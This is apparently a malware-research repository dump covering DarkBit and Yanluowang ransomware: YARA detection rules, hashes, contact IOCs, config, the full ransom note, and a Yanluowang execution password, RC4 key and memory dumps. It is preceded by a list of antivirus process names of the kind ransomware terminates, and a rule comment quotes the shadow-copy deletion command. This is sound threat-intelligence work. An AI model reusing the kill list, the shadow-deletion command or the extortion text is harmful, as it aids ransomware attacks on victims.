194 | cntaosmgr.exe 195 | comhost.exe 196 | coreframeworkhost.exe 197 | coreserviceshell.exe 198 | cpdclnt.exe 199 | cpf.exe 200 | cpntsrv.exe 201 | csinject.exe 202 | csinsm32.exe 203 | csinsmnt.exe 204 | 
cylancesvc.exe 205 | cylanceui.exe 206 | dbserv.exe 207 | dbsrv9.exe 208 | defwatch 209 | defwatch.exe 210 | deloeminfs.exe 211 | devmgmtservice.exe 212 | diskmon.exe 213 | djsnetcn.exe 214 | doscan.exe 215 | drsdkcaller.exe 216 | drwagntd.exe 217 | drwagnui.exe 218 | drweb.exe 219 | drweb32.exe 220 | drweb32w.exe 221 | drweb386.exe 222 | drwebcgp.exe 223 | drwebcom.exe 224 | drwebdc.exe 225 | drwebmng.exe 226 | drwebscd.exe 227 | drwebupw.exe 228 | drwebwcl.exe 229 | drwebwin.exe 230 | drwinst.exe 231 | drwupgrade.exe 232 | dwantispam.exe 233 | dwarkdaemon.exe 234 | dwengine.exe 235 | dwhwizrd.exe 236 | dwnetfilter.exe 237 | dwscanner.exe 238 | dwservice.exe 239 | dwwatcher.exe 240 | egui.exe 241 | eguiproxy.exe 242 | ehttpsrv.exe 243 | ekrn.exe 244 | engineserver.exe 245 | era.exe 246 | eraagent.exe 247 | eraserver.exe 248 | eshasrv.exe 249 | eventparser.exe 250 | fameh32.exe 251 | fch32.exe 252 | ffselect.exe 253 | fpavserver.exe 254 | fprottray.exe 255 | frameworkservic.exe 256 | frameworkservice.exe 257 | fsaua.exe 258 | fsav32.exe 259 | fsavgui.exe 260 | fscuif.exe 261 | fsdfwd.exe 262 | fsgk32.exe 263 | fsgk32st.exe 264 | fsguidll.exe 265 | fsguiexe.exe 266 | fshdll32.exe 267 | fshoster32.exe 268 | fshoster64.exe 269 | fsm32.exe 270 | fsma32.exe 271 | fsmb32.exe 272 | fsorsp.exe 273 | fspc.exe 274 | fsqh.exe 275 | fssm32.exe 276 | fwcfg.exe 277 | fwinst.exe 278 | gdagentsrv.exe 279 | gdagentui.exe 280 | gddcinst32.exe 281 | gdfirewalltray.exe 282 | gdfwsvc.exe 283 | gdkbfltexe32.exe 284 | gdsc.exe 285 | gdscan.exe 286 | gdwfpcd_inst.exe 287 | ghost_2.exe 288 | ghosttray.exe 289 | gmer.exe 290 | gozer.exe 291 | gziface.exe 292 | gzserv.exe 293 | hmpalert.exe 294 | hmpalert1.exe 295 | hmpalert2.exe 296 | hmpalert3.exe 297 | hwapi.exe 298 | icepack.exe 299 | idsinst.exe 300 | iface.exe 301 | inicio.exe 302 | inorpc.exe 303 | inort.exe 304 | isntsmtp.exe 305 | ispwdsvc.exe 306 | issvc.exe 307 | isuac.exe 308 | kabackreport.exe 309 | kaccore.exe 310 | 
kanmcmain.exe 311 | kansgui.exe 312 | kansvr.exe 313 | kasavsrv.exe 314 | kastray.exe 315 | kav.exe 316 | kav32.exe 317 | kavfs.exe 318 | kavfsgt.exe 319 | kavfswp.exe 320 | kavisarv.exe 321 | kavmm.exe 322 | kavshell.exe 323 | kavss.exe 324 | kavstart.exe 325 | kavsvc.exe 326 | kavtray.exe 327 | kis.exe 328 | kislive.exe 329 | kissvc.exe 330 | klactprx.exe 331 | klcsweb.exe 332 | klnagent.exe 333 | klserver.exe 334 | klswd.exe 335 | klwtblfs.exe 336 | kmailmon.exe 337 | knupdatemain.exe 338 | kpfw32.exe 339 | kpfwsvc.exe 340 | ksnproxy.exe 341 | kswebshield.exe 342 | kwatch.exe 343 | kwsprod.exe 344 | kxeserv.exe 345 | livesrv.exe 346 | lmon.exe 347 | log_qtine.exe 348 | loggingserver.exe 349 | luall.exe 350 | lucallbackproxy.exe 351 | lucoms.exe 352 | lucoms 353 | macmnsvc.exe 354 | macompatsvc.exe 355 | masalert.exe 356 | massrv.exe 357 | masvc.exe 358 | mbam.exe 359 | mbamservice.exe 360 | mbamtray.exe 361 | mcafeedatabackup.exe 362 | mcagent.exe 363 | mcapexe.exe 364 | mcconsol.exe 365 | mcdash.exe 366 | mcinfo.exe 367 | mcmscsvc.exe 368 | mcnasvc.exe 369 | mcods.exe 370 | mcpromgr.exe 371 | mcproxy.exe 372 | mcsacore.exe 373 | mcsagent.exe 374 | mcsclient.exe 375 | mcscript_inuse.exe 376 | mcshell.exe 377 | mcshield.exe 378 | mcshld9x.exe 379 | mcsvhost.exe 380 | mctray.exe 381 | mcui32.exe 382 | mcuimgr.exe 383 | mcupdate.exe 384 | mcvsrte.exe 385 | mcvsshld.exe 386 | mfeann.exe 387 | mfeatp.exe 388 | mfecanary.exe 389 | mfeconsole.exe 390 | mfeensppl.exe 391 | mfeesp.exe 392 | mfefire.exe 393 | mfefw.exe 394 | mfehcs.exe 395 | mfemactl.exe 396 | mfemms.exe 397 | mfetp.exe 398 | mfevtps.exe 399 | mfewc.exe 400 | mfewch.exe 401 | mgavrtcl.exe 402 | mghtml.exe 403 | mpcmdrun.exe 404 | mpfsrv.exe 405 | mps.exe 406 | mpsevh.exe 407 | msascui.exe 408 | msascuil.exe 409 | msksrver.exe 410 | msmpeng.exe 411 | msscli.exe 412 | msseces.exe 413 | msssrv.exe 414 | myagttry.exe 415 | nailgpip.exe 416 | navapsvc.exe 417 | navapw32.exe 418 | navectrl.exe 419 | navelog.exe 
420 | navesp.exe 421 | navshcom.exe 422 | navw32.exe 423 | navwnt.exe 424 | ndetect.exe 425 | ngctw32.exe 426 | ngserver.exe 427 | nisoptui.exe 428 | nisserv.exe 429 | nisum.exe 430 | nmain.exe 431 | nod32.exe 432 | nod32krn.exe 433 | nod32kui.exe 434 | nortonsecurity.exe 435 | npfmntor.exe 436 | nprotect.exe 437 | npscheck.exe 438 | npssvc.exe 439 | nscsrvce.exe 440 | nsctop.exe 441 | nsmdemf.exe 442 | nsmdmon.exe 443 | nsmdreal.exe 444 | nsmdsch.exe 445 | nsmdtr.exe 446 | ntrtscan.exe 447 | oasclnt.exe 448 | ofcdog.exe 449 | olfsnt40.exe 450 | ollydbg.exe 451 | opscan.exe 452 | padfsvr.exe 453 | pagentwd.exe 454 | pasystemtray.exe 455 | pavbckpt.exe 456 | pavfires.exe 457 | pavfnsvr.exe 458 | pavjobs.exe 459 | pavkre.exe 460 | pavmail.exe 461 | pavprot.exe 462 | pavprsrv.exe 463 | pavreport.exe 464 | pavsched.exe 465 | pavsrv50.exe 466 | pavsrv51.exe 467 | pavsrv52.exe 468 | pccnt.exe 469 | pccntmon.exe 470 | pccntupd.exe 471 | pcctlcom.exe 472 | pcscnsrv.exe 473 | pnmsrv.exe 474 | poproxy.exe 475 | popwndlog.exe 476 | ppmcativedetection.exe 477 | pqibrowser.exe 478 | pqv2isvc.exe 479 | prevsrv.exe 480 | productagentservice.exe 481 | promoutil.exe 482 | psanhost.exe 483 | psctris.exe 484 | psctrls.exe 485 | pshost.exe 486 | psimreal.exe 487 | psimsvc.exe 488 | pskmssvc.exe 489 | psuamain.exe 490 | psuaservice.exe 491 | ptsessionagent.exe 492 | ptsvchost.exe 493 | ptwatchdog.exe 494 | pxemtftp.exe 495 | pxeservice.exe 496 | qdcsfs.exe 497 | qhactivedefense.exe 498 | qhsafemain.exe 499 | qhsafetray.exe 500 | qhwatchdog.exe 501 | qserver.exe 502 | redirsvc.exe 503 | reportersvc.exe 504 | rnav.exe 505 | rpcserv.exe 506 | rtvscan.exe 507 | saservice.exe 508 | sav32cli.exe 509 | savadminservice.exe 510 | savfmsesp.exe 511 | savmain.exe 512 | savroam.exe 513 | savscan.exe 514 | savservice.exe 515 | savui.exe 516 | sbamsvc.exe 517 | sbamtray.exe 518 | sbpimsvc.exe 519 | sbserv.exe 520 | scan32.exe 521 | scanexplicit.exe 522 | schupd.exe 523 | sdcservice.exe 524 | 
sdrservice.exe 525 | seccenter.exe 526 | sedservice.exe 527 | semlaunchsvc.exe 528 | semsvc.exe 529 | sepwscsvc.exe 530 | sepwscsvc64.exe 531 | sesclu.exe 532 | setloadorder.exe 533 | setupguimngr.exe 534 | sevinst.exe 535 | shstat.exe 536 | sisidsservice.exe 537 | sisipsservice.exe 538 | sisipsutil.exe 539 | siteadv.exe 540 | smartscreen.exe 541 | smc.exe 542 | smcgui.exe 543 | sms.exe 544 | smsectrl.exe 545 | smselog.exe 546 | smsesjm.exe 547 | smsesp.exe 548 | smsesrv.exe 549 | smsetask.exe 550 | smseui.exe 551 | sndmon.exe 552 | sndsrvc.exe 553 | sntpservice.exe 554 | Sophos UI.exe 555 | sophoscleanm.exe 556 | SophosCleanM.exe 557 | sophosfilescanner.exe 558 | SophosFileScanner.exe 559 | SophosFIMService.exe 560 | sophosfs.exe 561 | SophosFS.exe 562 | sophoshealth.exe 563 | SophosHealth.exe 564 | SophosNtpService.exe 565 | sophossafestore32.exe 566 | SophosSafestore64.exe 567 | sophosui.exe 568 | spbbcsvc.exe 569 | spideragent.exe 570 | spiderml.exe 571 | spidernt.exe 572 | spiderui.exe 573 | spntsvc.exe 574 | srvlauncher.exe 575 | srvmon.exe 576 | sspservice.exe 577 | ssscheduler.exe 578 | starta.exe 579 | stopa.exe 580 | stopp.exe 581 | stwatchdog.exe 582 | superantispyware.exe 583 | swc_service.exe 584 | sweepsrv.sys 585 | swi_fc.exe 586 | swi_filter.exe 587 | swi_service.exe 588 | swnetsup.exe 589 | symcorpui.exe 590 | symlcsvc.exe 591 | symproxysvc.exe 592 | symsport.exe 593 | symtray.exe 594 | symwsc.exe 595 | sysdoc32.exe 596 | sysoptenginesvc.exe 597 | tbmon.exe 598 | tmas.exe 599 | tmccsf.exe 600 | tmlisten.exe 601 | tmntsrv.exe 602 | tmpfw.exe 603 | tmproxy.exe 604 | tmsainstance32.exe 605 | tnbutil.exe 606 | toolbarupdater.exe 607 | tpmgma.exe 608 | tpsrv.exe 609 | tptray.exe 610 | ucservice.exe 611 | udaterui.exe 612 | uiseagnt.exe 613 | uiwatchdog.exe 614 | uiwinmgr.exe 615 | updaterui.exe 616 | updatesrv.exe 617 | updtnv28.exe 618 | uplive.exe 619 | urllstck.exe 620 | usrprmpt.exe 621 | v2iconsole.exe 622 | v3clnsrv.exe 623 | v3exec.exe 624 | 
v3imscn.exe
v3lite.exe
v3main.exe
v3medic.exe
v3sp.exe
v3svc.exe
vapm.exe
vettray.exe
vipreui.exe
vpc32.exe
vpdn_lu.exe
vprosvc.exe
vptray.exe
vsmain.exe
vsserv.exe
vsstat.exe
wfxctl32.exe
wfxmod32.exe
wfxsnt40.exe
wrsa.exe
wscstatuscontroller.exe
wtusystemsuport.exe
xcommsvr.exe
```
--------------------------------------------------------------------------------
/Ransomware-Windows-DarkBit/README.md:
--------------------------------------------------------------------------------
# DarkBit Ransomware

## YARA rules:
```yara
// Ransom-note rule: two of the note sentences, or the onion address on its
// own. Because $tor alone is sufficient, expect hits on threat reports and
// IOC lists that quote the address, not only on RECOVERY_DARKBIT.txt.
rule ransomware_darkbit_ransomnote : windows ransomware darkbit {
    meta:
        author = "albertzsigovits"
        reference = "https://twitter.com/vxunderground/status/1624814604936249345"
        date = "2023-02-13"
    strings:
        $note1 = "But, you can contact us via TOX messenger if you want to recover your files personally." ascii wide
        $note2 = "All your files are encrypted using AES-256 military grade algorithm." ascii wide
        $note3 = "They should pay for firing high-skilled experts." ascii wide
        $tor = "iw6v2p3cruy7tqfup3yl4dgt4pfibfa3ai4zgnu5df2q3hus3lm7c7ad.onion" ascii wide
    condition:
        2 of ($note*) or $tor
}

// Static-string rule for the unpacked PE (sha256 in meta). Two independent
// paths: (1) Go/MinGW/CGO toolchain markers + Restart Manager API names +
// JSON config keys, or (2) JSON config keys + a DarkBit-specific key.
rule ransomware_darkbit_windows_Strings : windows ransomware darkbit {
    meta:
        author = "albertzsigovits"
        date = "2023-02-16"
        filetype = "pe"
        threat = "Ransomware.DarkBit.Windows"
        sha256 = "9107be160f7b639d68fe3670de58ed254d81de6aec9a41ad58d91aa814a247ff"
    strings:
        // Toolchain markers: Go build-info magic, MinGW runtime, CGO export stub
        $goinf = " Go buildinf:"
        $mingw = "Mingw-w64 runtime failure:"
        $cgo = "_cgo_dummy_export"

        // Restart Manager API (Rstrtmgr.dll). Ransomware commonly uses it to
        // release file locks before encryption — presumed here, not verified.
        $rstr1 = "Rstrtmgr.dll"
        $rstr2 = "RmStartSession"
        $rstr3 = "RmRegisterResources"
        $rstr4 = "RmGetList"
        $rstr5 = "RmShutdown"
        $rstr6 = "RmEndSession"

        // JSON keys (trailing colon included) — presumably the embedded
        // configuration; generic on their own, hence the 3-of / 2-of gates.
        $cfg1 = "\"names\":"
        $cfg2 = "\"limits\":"
        $cfg3 = "\"extensions\":"
        $cfg4 = "\"processes\":"
        $cfg5 = "\"hostnames\":"

        // DarkBit-specific JSON keys (note/image names, family name)
        $db1 = "\"darkbit.jpg\":"
        $db2 = "\"recovery_darkbit.txt\":"
        $db3 = "\"Darkbit\":"
    condition:
        uint16(0) == 0x5A4D                       // "MZ"
        and uint32(uint32(0x3C)) == 0x00004550    // "PE\0\0" at e_lfanew
        and (
            ( $goinf and $mingw and $cgo and 2 of ($rstr*) and 3 of ($cfg*) )
            or
            ( 2 of ($cfg*) and 1 of ($db*) )
        )
}

// Code-pattern rule: 3 of the 5 hex patterns. Stack displacements are
// wildcarded (?? ??) where the disassembly shows a concrete offset, so the
// patterns tolerate frame-layout changes between builds.
rule ransomware_darkbit_windows_asm : windows ransomware darkbit {
    meta:
        author = "albertzsigovits"
        date = "2023-02-16"
        filetype = "pe"
        threat = "Ransomware.DarkBit.Windows"
        sha256 = "9107be160f7b639d68fe3670de58ed254d81de6aec9a41ad58d91aa814a247ff"
    strings:
        // $gob1 / $gob2: fragments attributed to the Gobfuscate layer (see
        // "Obfuscation" in the diary); no further meaning asserted.
        $gob1 = {
            45 88 47 ??               // mov byte [r15 + 1], r8b
            90                        // nop
            4C 8B 84 24 ?? ?? 00 00   // mov r8, qword [rsp + 0x88]
            49 C1 E8 ??               // shr r8, 4
            49 83 C7 ??               // add r15, 2
            48 8B 44 24 ??            // mov rax, qword [rsp + 0x78]
            4C 8B 8C 24 ?? ?? 00 00   // mov r9, qword [rsp + 0xb0]
            48 89 D0                  // mov rax, rdx
            48 8B 94 24 ?? ?? 00 00   // mov rdx, qword [rsp + 0xc0]
            4C 89 84 24 ?? ?? 00 00   // mov qword [rsp + 0x88], r8
            41 ?? ?? ??               // and r8d, 0xf
            49
        }

        $gob2 = {
            48 89 84 24 ?? ?? 00 00   // mov qword ptr ss:[rsp+D0],rax
            48 89 5C 24 ??            // mov qword ptr ss:[rsp+60],rbx
            31 C0                     // xor eax,eax
            48 8D 5C 24 ??            // lea rbx,qword ptr ss:[rsp+44]
            B9 ?? 00 00 00            // mov ecx,6
        }

        // The two 64-bit immediates are the wyhash secret constants
        // (cf. "Hashing: Wyhash" in the diary). Any wyhash user will carry
        // them, so this pattern is corroborating, not unique to DarkBit.
        $wyhash = {
            4D 8B 88 ?? ?? 00 00             // mov r9, qword [r8 + 0xf0]
            49 BA 2F 64 BD 78 64 1D 76 A0    // movabs r10, 0xa0761d6478bd642f
            4D 01 D1                         // add r9, r10
            49 BB DB 28 B4 A0 D1 7E 03 E7    // movabs r11, 0xe7037ed1a0b428db
            4D 31 CB                         // xor r11, r9
        }

        // Assembly of the argv slice for "vssadmin.exe delete shadows /all /Quiet"
        // (per the annotated stack contents) — shadow-copy deletion.
        $vss1 = {
            48 8B 94 24 ?? ?? 00 00   // mov rdx,qword ptr ss:[rsp+C8] [rsp+C8]:"delete"
            48 89 94 24 ?? ?? 00 00   // mov qword ptr ss:[rsp+138],rdx [rsp+138]:"delete"
            48 8B 54 24 ??            // mov rdx,qword ptr ss:[rsp+58]
            48 89 94 24 ?? ?? 00 00   // mov qword ptr ss:[rsp+140],rdx
            48 8B 94 24 ?? ?? 00 00   // mov rdx,qword ptr ss:[rsp+F0] [rsp+F0]:"shadows"
            48 89 94 24 ?? ?? 00 00   // mov qword ptr ss:[rsp+148],rdx [rsp+148]:"shadows"
            48 8B 94 24 ?? ?? 00 00   // mov rdx,qword ptr ss:[rsp+80]
            48 89 94 24 ?? ?? 00 00   // mov qword ptr ss:[rsp+150],rdx
            48 8B 94 24 ?? ?? 00 00   // mov rdx,qword ptr ss:[rsp+C0] [rsp+C0]:"/all"
            48 89 94 24 ?? ?? 00 00   // mov qword ptr ss:[rsp+158],rdx [rsp+158]:"/all"
            48 8B 54 24 ??            // mov rdx,qword ptr ss:[rsp+50]
            48 89 94 24 ?? ?? 00 00   // mov qword ptr ss:[rsp+160],rdx
            48 89 84 24 ?? ?? 00 00   // mov qword ptr ss:[rsp+168],rax [rsp+168]:"/Quiet"
            48 89 9C 24 ?? ?? 00 00   // mov qword ptr ss:[rsp+170],rbx
            48 8B 84 24 ?? ?? 00 00   // mov rax,qword ptr ss:[rsp+D0] [rsp+D0]:"vssadmin.exe"
            48 8B 5C 24 ??            // mov rbx,qword ptr ss:[rsp+60]
            48 8D 8C 24 ?? ?? 00 00   // lea rcx,qword ptr ss:[rsp+138] [rsp+138]:"delete"
        }

        // 8-byte immediates written to overlapping stack slots (+B1,+B8,+A2,+A9)
        // — looks like on-stack reconstruction of an obfuscated string (cf.
        // Gobfuscate). Which string it decodes to is not shown here; the name
        // suggests the vssadmin command line — confirm in the sample.
        $vss2 = {
            48 BA CB BB 16 11 B4 B1 42 AD   // mov rdx,AD42B1B41116BBCB
            48 89 94 24 ?? ?? 00 00         // mov qword ptr ss:[rsp+B1],rdx
            48 BA AD 6D A1 5B 11 15 7B 7B   // mov rdx,7B7B15115BA16DAD
            48 89 94 24 ?? ?? 00 00         // mov qword ptr ss:[rsp+B8],rdx
            48 BA 9D C8 65 70 D0 DC 2B C3   // mov rdx,C32BDCD07065C89D
            48 89 94 24 ?? ?? 00 00         // mov qword ptr ss:[rsp+A2],rdx
            48 BA C3 4D C5 3E 7D 70 0F 1E   // mov rdx,1E0F707D3EC54DC3
            48 89 94 24 ?? ?? 00 00         // mov qword ptr ss:[rsp+A9],rdx
        }

    condition:
        uint16(0) == 0x5A4D                       // "MZ"
        and uint32(uint32(0x3C)) == 0x00004550    // "PE\0\0" at e_lfanew
        and 3 of them
}
```

## DarkBit diary:
```
SHA256: 9107be160f7b639d68fe3670de58ed254d81de6aec9a41ad58d91aa814a247ff
Packer: None
Compile time: 2023-02-11 22:10:54
PEInfo: PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
Language: Golang (CGO)
Obfuscation: Gobfuscate
Hashing: Wyhash hash algorithm and wyrand PRNG
Ransomware Mutex: Global\dbdbdbdb

Ransomware Note: RECOVERY_DARKBIT.txt
SHA256: fca050431ba94630d691a7d6cbdd491354c69f738b0d8e03b531173a741ad286

TOR: hxxp://iw6v2p3cruy7tqfup3yl4dgt4pfibfa3ai4zgnu5df2q3hus3lm7c7ad[.]onion/support
TOX ID: AB33BC51AFAC64D98226826E70B483593C81CB22E6A3B504F7A75348C38C862F00042F5245AC
Telegram: DarkBitChannel
Twitter: DarkBitTW
```

## DarkBit parameters:
```
-h | Help
-all | Run on all without timeout counter
-domain | Domain
-force | Force blacklisted computers
-list | List
-nomutex | Force not checking mutex
-noransom | No encryption
-password | Password
-path | Path
-t | Threads
-username | Username
```

## VirusTotal perks:
```
vhash:0560b76d5555151c051d1az3f1d&z1
authentihash:8a1db8d4c117daa25ab31735b9866cb989907cf524fe2c052ffa9e67f582c79c
imphash:9bcadd8ed34a63728178995d1b006421
ssdeep:"49152:S4mkYp+03HbhndpeoVK9/0cjXd77yg6PxHuy7vDKD12K5EKGHg1q14gUynCLgIMk:UF31ed/XB7AbvbAEKGpTI7" 175 | behaviour_files:"%HOMEPATH%\\recovery_darkbit.txt" 176 | behaviour_files:"%HOMEPATH%\\appdata\\recovery_darkbit.txt" 177 | behaviour:"Global\\dbdbdbdb" 178 | behaviour:"\\Sessions\\1\\BaseNamedObjects\\Global\\dbdbdbdb" 179 | ``` 180 | 181 | ## Config template: 182 | ``` 183 | "limits": [ 184 | "limitMB": 25, 185 | "parts": 1, 186 | "eachPart": -1 187 | }, 188 | { 189 | "limitMB": 1000, 190 | "parts": 2, 191 | "eachPart": 12000 192 | }, 193 | { 194 | "limitMB": 4000, 195 | "parts": 3, 196 | "eachPart": 10000 197 | }, 198 | { 199 | "limitMB": 7000, 200 | "parts": 2, 201 | "eachPart": 20000 202 | }, 203 | { 204 | "limitMB": 11000, 205 | "parts": 3, 206 | "eachPart": 30000 207 | }, 208 | { 209 | "limitMB": 51000, 210 | "parts": 5, 211 | "eachPart": 30000 212 | }, 213 | { 214 | "limitMB": 1000000, 215 | "parts": 3, 216 | "eachPart": 1000000 217 | }, 218 | { 219 | "limitMB": 5000000, 220 | "parts": 5, 221 | "eachPart": 1000000 222 | }, 223 | { 224 | "limitMB": 6000000, 225 | "parts": 20, 226 | "eachPart": 10000000 227 | } 228 | ], 229 | "extensions": { 230 | "msilog": 1, 231 | "log": 1, 232 | "ldf": 1, 233 | "lock": 1, 234 | "theme": 1, 235 | "msi": 1, 236 | "sys": 1, 237 | "wpx": 1, 238 | "cpl": 1, 239 | "adv": 1, 240 | "msc": 1, 241 | "scr": 1, 242 | "key": 1, 243 | "ico": 1, 244 | "dll": 1, 245 | "hta": 1, 246 | "deskthemepack": 1, 247 | "nomedia": 1, 248 | "msu": 1, 249 | "rtp": 1, 250 | "msp": 1, 251 | "idx": 1, 252 | "ani": 1, 253 | "386": 1, 254 | "diagcfg": 1, 255 | "bin": 1, 256 | "mod": 1, 257 | "ics": 1, 258 | "com": 1, 259 | "hlp": 1, 260 | "spl": 1, 261 | "nls": 1, 262 | "cab": 1, 263 | "diagpkg": 1, 264 | "icl": 1, 265 | "ocx": 1, 266 | "rom": 1, 267 | "prf": 1, 268 | "themepack": 1, 269 | "msstyles": 1, 270 | "icns": 1, 271 | "mpa": 1, 272 | "drv": 1, 273 | "cur": 1, 274 | "diagcab": 1, 275 | "exe": 1, 276 | "cmd": 1, 277 | "shs": 1, 278 | 
"Darkbit": 1 279 | }, 280 | "names": { 281 | "thumbs.db": 1, 282 | "desktop.ini": 1, 283 | "darkbit.jpg": 1, 284 | "recovery_darkbit.txt": 1, 285 | "system volume information": 1 286 | }, 287 | "processes": [], 288 | "hostnames": [ 289 | --- LIST OF TARGET HOSTNAMES --- 290 | ] 291 | ``` 292 | 293 | ## Ransom note: 294 | ``` 295 | Dear Colleagues, 296 | We’re sorry to inform you that we’ve had to hack Technion network completely and transfer “all” data to our secure servers. 297 | So, keep calm, take a breath and think about an apartheid regime that causes troubles here and there. 298 | They should pay for their lies and crimes, their names and shames. They should pay for occupation, war crimes against humanity, 299 | killing the people (not only Palestinians’ bodies, but also Israelis’ souls) and destroying the future and all dreams we had. 300 | They should pay for firing high-skilled experts. 301 | 302 | Anyway, there is nothing for you (as an individual) to be worried. 303 | That’s the task of the administration to follow up our instruction for recovering the network. 304 | But, you can contact us via TOX messenger if you want to recover your files personally. (TOX ID: AB33BC51AFAC64D98226826E70B483593C81CB22E6A3B504F7A75348C38C862F00042F5245AC) 305 | 306 | Our instruction for the administration: 307 | All your files are encrypted using AES-256 military grade algorithm. So, 308 | 1. Don't try to recover data, because the encrypted files are unrecoverable unless you have the key. 309 | Any try for recovering data without the key (using third-party applications/companies) causes PERMANENT damage. Take it serious. 310 | 2. You have to trust us. This is our business (after firing from high-tech companies) and the reputation is all we have. 311 | 3. All you need to do is following up the payment procedure and then you will receive decrypting key using for returning all of your files and VMs. 312 | 4. 
Payment method: 313 | Enter the link below 314 | http://iw6v2p3cruy7tqfup3yl4dgt4pfibfa3ai4zgnu5df2q3hus3lm7c7ad.onion/support 315 | Enter the ID below and pay the bill (80 BTC) 316 | $TARGETID 317 | You will receive decrypting key after the payment. 318 | 319 | Notice that you just have 48 hours. After the deadline, a 30% penalty will be added to the price. 320 | We put data for sale after 5 days. 321 | Take it serious and don’t listen to probable advices of a stupid government. 322 | 323 | Good Luck! 324 | “DarkBit” 325 | ``` 326 | -------------------------------------------------------------------------------- /Ransomware-Windows-Yanluowang/README.md: -------------------------------------------------------------------------------- 1 | ## SHA256 2 | ``` 3 | d11793433065633b84567de403c1989640a07c9a399dd2753aaf118891ce791c 4 | 49d828087ca77abc8d3ac2e4719719ca48578b265bbb632a1a7a36560ec47f2d 5 | ``` 6 | 7 | ### Password for execution (--pass): 8 | ``` 9 | D86BDXL9N3H 10 | ``` 11 | 12 | ### RC4 key used to decrypt the embedded RSA public key and ransom note: 13 | ``` 14 | RSCNFZJCXGCGF8Q6TOY7IKPE9J3PO6DAPGZFKLHARGXW 15 | ``` 16 | 17 | ### RSA Public key: 1024-bit 18 | ``` 19 | -----BEGIN PUBLIC KEY----- 20 | MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDghZ1IjKZQIMvxDBd6BtWu6ytb 21 | VtkGOQItQivbeKA4yFnVPlpX7X/vm8CPnspbmzxEmr13DTcT6N0+Uvaz/cw6FDzA 22 | qThpj2Xl3OKW0Ph3ACSIezg3h187ITcOiOuMu0wn3QjNamNwWhQ7Q9uLiwLk1HNb 23 | A1LD9h4cDMfQvwq3oQIDAQAB 24 | -----END PUBLIC KEY----- 25 | ``` 26 | 27 | ### Crypto APIs used: 28 | ``` 29 | CryptAcquireContextA 30 | CryptAcquireContextW 31 | CryptDecodeObjectEx 32 | CryptEncrypt 33 | CryptGenRandom 34 | CryptImportPublicKeyInfo 35 | CryptReleaseContext 36 | CryptStringToBinaryA 37 | ``` 38 | 39 | ### Encryption details: 40 | ``` 41 | 32-byte random key, via CryptGenRandom 42 | dwProvType: PROV_RSA_FULL (0x00000001) 43 | szContainer: Crypto++ RNG 44 | OID: 1.2.840.113549.1.1.1 45 | Encryption Scheme: RSAES-PKCS1-V1_5 46 | ``` 47 | 48 | ### Following 
the encryption: 49 | ``` 50 | 32-byte random key via CryptGenRandom 51 | 00F15CF0 4F 46 95 F1 DC 2C CA 36 F3 C9 57 60 97 B5 6A 05 OF.ñÜ,Ê6óÉW`.µj. 52 | 00F15D00 1C 25 7D CD 7A AE 62 48 03 A1 DE 2E 7C 0C C2 2A .%}Íz®bH.¡Þ.|.Â* 53 | 54 | RC4 decryption of RSA public key 55 | 00F15DF0 2D 2D 2D 2D 2D 42 45 47 49 4E 20 50 55 42 4C 49 -----BEGIN PUBLI 56 | 00F15E00 43 20 4B 45 59 2D 2D 2D 2D 2D 0A 4D 49 47 66 4D C KEY-----.MIGfM 57 | 00F15E10 41 30 47 43 53 71 47 53 49 62 33 44 51 45 42 41 A0GCSqGSIb3DQEBA 58 | 00F15E20 51 55 41 41 34 47 4E 41 44 43 42 69 51 4B 42 67 QUAA4GNADCBiQKBg 59 | 00F15E30 51 44 67 68 5A 31 49 6A 4B 5A 51 49 4D 76 78 44 QDghZ1IjKZQIMvxD 60 | 00F15E40 42 64 36 42 74 57 75 36 79 74 62 0A 56 74 6B 47 Bd6BtWu6ytb.VtkG 61 | 00F15E50 4F 51 49 74 51 69 76 62 65 4B 41 34 79 46 6E 56 OQItQivbeKA4yFnV 62 | 00F15E60 50 6C 70 58 37 58 2F 76 6D 38 43 50 6E 73 70 62 PlpX7X/vm8CPnspb 63 | 00F15E70 6D 7A 78 45 6D 72 31 33 44 54 63 54 36 4E 30 2B mzxEmr13DTcT6N0+ 64 | 00F15E80 55 76 61 7A 2F 63 77 36 46 44 7A 41 0A 71 54 68 Uvaz/cw6FDzA.qTh 65 | 00F15E90 70 6A 32 58 6C 33 4F 4B 57 30 50 68 33 41 43 53 pj2Xl3OKW0Ph3ACS 66 | 00F15EA0 49 65 7A 67 33 68 31 38 37 49 54 63 4F 69 4F 75 Iezg3h187ITcOiOu 67 | 00F15EB0 4D 75 30 77 6E 33 51 6A 4E 61 6D 4E 77 57 68 51 Mu0wn3QjNamNwWhQ 68 | 00F15EC0 37 51 39 75 4C 69 77 4C 6B 31 48 4E 62 0A 41 31 7Q9uLiwLk1HNb.A1 69 | 00F15ED0 4C 44 39 68 34 63 44 4D 66 51 76 77 71 33 6F 51 LD9h4cDMfQvwq3oQ 70 | 00F15EE0 49 44 41 51 41 42 0A 2D 2D 2D 2D 2D 45 4E 44 20 IDAQAB.-----END 71 | 00F15EF0 50 55 42 4C 49 43 20 4B 45 59 2D 2D 2D 2D 2D PUBLIC KEY----- 72 | 73 | CryptStringBinaryA and LocalAlloc (30 81 9F 30) 74 | 00F182F8 30 81 9F 30 0D 06 09 2A 86 48 86 F7 0D 01 01 01 0..0...*.H.÷.... 75 | 00F18308 05 00 03 81 8D 00 30 81 89 02 81 81 00 E0 85 9D ......0......à.. 
